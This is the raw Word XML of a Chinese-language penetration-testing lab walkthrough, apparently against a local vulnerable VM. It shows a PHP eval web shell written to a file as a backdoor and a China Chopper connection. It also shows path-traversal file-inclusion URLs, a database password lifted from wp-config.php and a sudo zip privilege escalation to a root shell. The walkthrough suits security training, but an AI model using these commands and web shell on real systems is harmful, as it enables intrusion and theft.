      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>]);?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2782FBD0" w14:textId="77777777" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00396EC1"/>
    <w:p w14:paraId="67031A06" w14:textId="79179AAB" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00553E7A">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>使用echo '&lt;?php @eval($_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>POST[</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">]);?&gt;' &gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>abc.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>编写后门</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A058AF3" w14:textId="06A50143" w:rsidR="00553E7A" w:rsidRDefault="00553E7A" w:rsidP="00553E7A">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00553E7A">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="032E216A" wp14:editId="6B1ECB18">
            <wp:extent cx="5274310" cy="1304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29C" w14:textId="77777777" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00396EC1"/>
    <w:p w14:paraId="1010233C" w14:textId="77777777" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00396EC1">
      <w:r>
        <w:t>f.恢复password文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56247250" w14:textId="77777777" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00396EC1"/>
    <w:p w14:paraId="4F4245C5" w14:textId="77777777" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00396EC1">
      <w:r>
        <w:t xml:space="preserve">    mv /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>passwd.bak</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C7B872F" w14:textId="3D6A630A" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00531DC3">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>head -1 /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55F902AC" w14:textId="46E5CF89" w:rsidR="00531DC3" w:rsidRDefault="00531DC3" w:rsidP="00531DC3">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00531DC3">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="79578A6A" wp14:editId="2E6607EF">
            <wp:extent cx="5091150" cy="2281254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1150" cy="22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F023" w14:textId="77777777" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00396EC1"/>
    <w:p w14:paraId="4DF2554B" w14:textId="1B4B2661" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00396EC1">
      <w:r>
        <w:t>10.启用中国菜刀，获取</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>webshell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>权限</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D0C26D0" w14:textId="777FB685" w:rsidR="00531DC3" w:rsidRDefault="00531DC3" w:rsidP="00396EC1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00531DC3">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7989FC68" wp14:editId="225793A9">
            <wp:extent cx="5176171" cy="2174682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3801" cy="217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B45" w14:textId="77777777" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00396EC1"/>
    <w:p w14:paraId="0B54ABC8" w14:textId="77777777" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00396EC1">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>11.清除痕迹</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A4ED8D8" w14:textId="77777777" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00396EC1">
      <w:r>
        <w:t>12.另一种</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>提权方式</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>（wp-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>config.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DE1B15B" w14:textId="77777777" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00396EC1"/>
    <w:p w14:paraId="665DD68F" w14:textId="7DB58709" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="0060226A">
      <w:pPr>
        <w:pStyle w:val="a5"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:t>拿到shell后，查看用户文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76DD0705" w14:textId="26714374" w:rsidR="0060226A" w:rsidRDefault="0060226A" w:rsidP="0060226A">
      <w:pPr>
        <w:pStyle w:val="a5"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="0060226A">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="74D831FA" wp14:editId="60845BB3">
            <wp:extent cx="3008009" cy="2703444"/>
            <wp:effectExtent l="0" t="0" r="190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3803" cy="27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C20" w14:textId="6FEE41A7" w:rsidR="0060226A" w:rsidRDefault="0060226A" w:rsidP="0060226A">
      <w:pPr>
        <w:pStyle w:val="a5"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0060226A">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="225996FC" wp14:editId="2DCEE015">
            <wp:extent cx="2933510" cy="395179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8175" cy="3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185F" w14:textId="77777777" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00396EC1"/>
    <w:p w14:paraId="609CC7FB" w14:textId="77777777" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00396EC1">
      <w:r>
        <w:t>b.查看wp-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>config.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79B0CF5B" w14:textId="77777777" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00396EC1"/>
    <w:p w14:paraId="0F0FDAD6" w14:textId="50BECB87" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00396EC1">
      <w:r>
        <w:t>cat wp-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>config.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4292CA4B" w14:textId="6B9EB770" w:rsidR="0060226A" w:rsidRDefault="0060226A" w:rsidP="00396EC1">
      <w:r w:rsidRPr="0060226A">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5E14CDAE" wp14:editId="5F236320">
            <wp:extent cx="4838735" cy="4295806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42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2458" w14:textId="48F90353" w:rsidR="0060226A" w:rsidRDefault="0060226A" w:rsidP="00396EC1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0060226A">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="14015142" wp14:editId="11971D1B">
            <wp:extent cx="5053049" cy="269083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049" cy="26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F21F" w14:textId="77777777" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00396EC1"/>
    <w:p w14:paraId="4C3779CF" w14:textId="77777777" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00396EC1">
      <w:r>
        <w:t xml:space="preserve">    发现MySQL database的账号</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>zico</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>（sWfCsfJSPV9H3AmQzw8）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0748DF6E" w14:textId="77777777" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00396EC1"/>
    <w:p w14:paraId="11B041A6" w14:textId="77777777" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00396EC1">
      <w:r>
        <w:t>c.尝试远程登录（成功）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31D34A1B" w14:textId="77777777" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00396EC1"/>
    <w:p w14:paraId="11CECE9E" w14:textId="3EEB6DBF" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00396EC1">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId51" w:history="1">
        <w:r w:rsidR="004A6CA3" w:rsidRPr="00FF0B3B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
          </w:rPr>
          <w:t>zico@192.168.10.151</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="79FECBC3" w14:textId="3CD8B42C" w:rsidR="004A6CA3" w:rsidRDefault="004A6CA3" w:rsidP="00396EC1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004A6CA3">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6084D1A0" wp14:editId="626AD891">
            <wp:extent cx="5176875" cy="1747850"/>
            <wp:effectExtent l="0" t="0" r="508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50F3" w14:textId="77777777" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00396EC1"/>
    <w:p w14:paraId="3D03540B" w14:textId="77777777" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00396EC1">
      <w:r>
        <w:t>d.查看目前用户可执行与无法执行的指令</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43BBF4B3" w14:textId="77777777" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00396EC1"/>
    <w:p w14:paraId="1CA7548A" w14:textId="77777777" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00396EC1">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -l</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A62FFFB" w14:textId="5BCCF001" w:rsidR="00396EC1" w:rsidRDefault="004A6CA3" w:rsidP="00396EC1">
      <w:r w:rsidRPr="004A6CA3">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6020372B" wp14:editId="4EF16089">
            <wp:extent cx="5267325" cy="16859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35D3" w14:textId="77777777" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00396EC1">
      <w:r>
        <w:t>e.提权</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D3499DF" w14:textId="77777777" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00396EC1"/>
    <w:p w14:paraId="75FFDF05" w14:textId="77777777" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00396EC1">
      <w:r>
        <w:t xml:space="preserve">    touch /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="741BA8F1" w14:textId="77777777" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00396EC1">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> zip exploit.zip exploit -T --unzip-command="python -c 'import </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pty</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>pty.spawn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>(\"/bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\")'"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="642D1591" w14:textId="77777777" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00396EC1"/>
    <w:p w14:paraId="30A14ACC" w14:textId="77777777" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00396EC1">
      <w:r>
        <w:t xml:space="preserve">    创建一个随机文件，并用 zip 命令进行压缩</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36BF35E6" w14:textId="77777777" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00396EC1"/>
    <w:p w14:paraId="60837E76" w14:textId="67AFCBC3" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="004A6CA3">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 用管理员权限执行 -T 检查文件的完整性，这个参数可以让他执行下一个参数 --unzip-command，在这个参数中写入一个python的交互shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A0BEF79" w14:textId="646DBBFD" w:rsidR="004A6CA3" w:rsidRPr="004A6CA3" w:rsidRDefault="004A6CA3" w:rsidP="004A6CA3">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004A6CA3">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="60D1B9A4" wp14:editId="68CBB586">
            <wp:extent cx="5267325" cy="6096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60C4" w14:textId="77777777" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00396EC1"/>
    <w:p w14:paraId="5D680842" w14:textId="77777777" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00396EC1">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B11A9A2" w14:textId="77777777" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00396EC1">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>总结：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FA5AE00" w14:textId="77777777" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00396EC1"/>
    <w:p w14:paraId="42112378" w14:textId="77777777" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00396EC1">
      <w:r>
        <w:t>1.浏览网页时，发现?page=xxx，尝试是否存在文件包含漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="268A9AF9" w14:textId="77777777" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00396EC1"/>
    <w:p w14:paraId="2E67F6E9" w14:textId="77777777" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00396EC1">
      <w:r>
        <w:t>2.在获取到一个登录界面时，常规做法：弱口令尝试、暴力破解（字典要足够强大）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="657801D0" w14:textId="77777777" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00396EC1"/>
    <w:p w14:paraId="47EA791B" w14:textId="77777777" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00396EC1">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>3.数据库中存在用户信息的可能性极大，服务器版本信息可能会找到版本漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0934D3E8" w14:textId="77777777" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00396EC1"/>
    <w:p w14:paraId="4AB22F9E" w14:textId="77777777" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00396EC1">
      <w:r>
        <w:t>4.wp-config.php文件也存在许多重要配置信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30D98D0D" w14:textId="77777777" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00396EC1"/>
    <w:p w14:paraId="076F64E0" w14:textId="17C5D828" w:rsidR="0052113B" w:rsidRDefault="00396EC1" w:rsidP="00396EC1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>5.</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>提权前</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>可查看目前用户可执行与无法执行的指令（</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -l）</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:sectPr w:rsidR="005211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012FDB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="919A6DAC"/>
    <w:lvl w:ilvl="0" w:tplc="C99A994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090172"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="39B2B614"/>
    <w:lvl w:ilvl="0" w:tplc="13A623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B0243E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="295E669C"/>
    <w:lvl w:ilvl="0" w:tplc="77D0F86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5CE"/>
    <w:rsid w:val="001D55E7"/>
    <w:rsid w:val="002924DF"/>
    <w:rsid w:val="0032115D"/>
    <w:rsid w:val="00396EC1"/>
    <w:rsid w:val="004A6CA3"/>
    <w:rsid w:val="0052113B"/>
    <w:rsid w:val="00531DC3"/>
    <w:rsid w:val="00553E7A"/>
    <w:rsid w:val="005D07E0"/>
    <w:rsid w:val="0060226A"/>
    <w:rsid w:val="007C05CE"/>
    <w:rsid w:val="008523F3"/>
    <w:rsid w:val="008D41CF"/>
    <w:rsid w:val="0099196C"/>
    <w:rsid w:val="00C921AD"/>
    <w:rsid w:val="00D4455C"/>
    <w:rsid w:val="00EB7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9D4C3"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{C3A645EC-72F6-4486-B467-376339F2F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23F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523F3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C921A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192.168.10.128/dirty.c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mailto:zico@192.168.10.151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192.168.10.151/view.php?page=../../../../../etc/passwd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192.168.10.151/view.php?page=../../../../usr/databases/hack.php" TargetMode="External"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.10.151/view.php?page=../../../../usr/databases/hack.php" TargetMode="External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475</Words>
  <Characters>2708</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>22</Lines>
  <Paragraphs>6</Paragraphs>
  <ScaleCrop>false</ScaleCrop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949947516@qq.com</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>949947516@qq.com</cp:lastModifiedBy>
  <cp:revision>55</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-11-21T07:29:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-11-21T08:01:00Z</dcterms:modified>
</cp:coreProperties>
</file>